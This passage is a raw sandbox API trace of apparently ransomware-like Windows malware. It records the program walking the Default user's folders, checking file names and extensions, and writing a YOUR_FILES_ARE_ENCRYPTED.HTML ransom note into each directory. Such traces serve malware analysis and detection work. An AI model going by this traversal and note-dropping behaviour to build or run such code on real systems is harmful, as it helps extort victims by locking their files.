dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0171.330] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.330] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0171.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.331] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.333] CloseHandle (hObject=0x5f8) returned 1 [0171.333] GetProcessHeap () returned 0x270000 [0171.334] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.334] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0171.334] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.334] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.335] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.337] CloseHandle (hObject=0x5a0) returned 1 [0171.337] GetProcessHeap () returned 0x270000 [0171.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.338] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0171.338] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0171.338] GetProcessHeap () returned 0x270000 [0171.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.338] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0171.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*") returned="\\\\?\\C:\\Users\\Default\\Links\\*" [0171.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb50332b0, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0171.343] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.343] lstrlenW (lpString=".ini") returned 4 [0171.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0171.343] lstrcmpW (lpString1="Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0171.343] lstrlenW (lpString=".lnk") returned 4 [0171.343] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb50332b0, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0171.343] lstrcmpW (lpString1="Downloads.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0171.343] lstrlenW (lpString=".lnk") returned 4 [0171.343] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad734f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x762, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\OneDrive.lnk") returned 39 [0171.343] lstrcmpW (lpString1="OneDrive.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.344] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0171.344] lstrlenW (lpString=".lnk") returned 4 [0171.344] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0171.344] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0171.344] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0171.344] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.344] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0171.344] lstrlenW (lpString=".lnk") returned 4 [0171.344] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0171.344] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0171.344] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.345] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.348] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.350] CloseHandle (hObject=0x5a0) returned 1 [0171.351] GetProcessHeap () returned 0x270000 [0171.351] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.351] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0171.351] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0171.351] GetProcessHeap () returned 0x270000 [0171.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.351] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0171.351] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned="\\\\?\\C:\\Users\\Default\\Local Settings\\*" [0171.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.352] GetProcessHeap () returned 0x270000 [0171.352] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.352] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Music", cAlternateFileName="")) returned 1 [0171.352] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0171.352] GetProcessHeap () returned 0x270000 [0171.352] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.352] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0171.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*") returned="\\\\?\\C:\\Users\\Default\\Music\\*" [0171.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.353] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0171.353] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.353] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.353] lstrlenW (lpString=".ini") returned 4 [0171.353] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.353] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.353] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.354] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.356] CloseHandle (hObject=0x5a0) returned 1 [0171.356] GetProcessHeap () returned 0x270000 [0171.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.357] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0171.357] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0171.357] GetProcessHeap () returned 0x270000 [0171.357] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.357] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0171.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned="\\\\?\\C:\\Users\\Default\\My Documents\\*" [0171.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.357] GetProcessHeap () returned 0x270000 [0171.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.358] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NetHood", cAlternateFileName="")) returned 1 [0171.358] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0171.358] GetProcessHeap () returned 0x270000 [0171.358] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.358] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0171.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned="\\\\?\\C:\\Users\\Default\\NetHood\\*" [0171.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.358] GetProcessHeap () returned 0x270000 [0171.359] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.359] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xbcc7bbc0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbcc7bbc0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0171.359] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0171.359] lstrcmpW (lpString1="NTUSER.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.359] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0171.359] lstrlenW (lpString=".DAT") returned 4 [0171.359] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0171.359] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x201486e4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x48a232fe, ftLastAccessTime.dwHighDateTime=0x1cbf8b9, ftLastWriteTime.dwLowDateTime=0x48a232fe, ftLastWriteTime.dwHighDateTime=0x1cbf8b9, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0171.359] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG") returned=".LOG" [0171.360] lstrlenW (lpString=".LOG") returned 4 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG") returned=".LOG" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xbcc7bbc0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x30400, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] 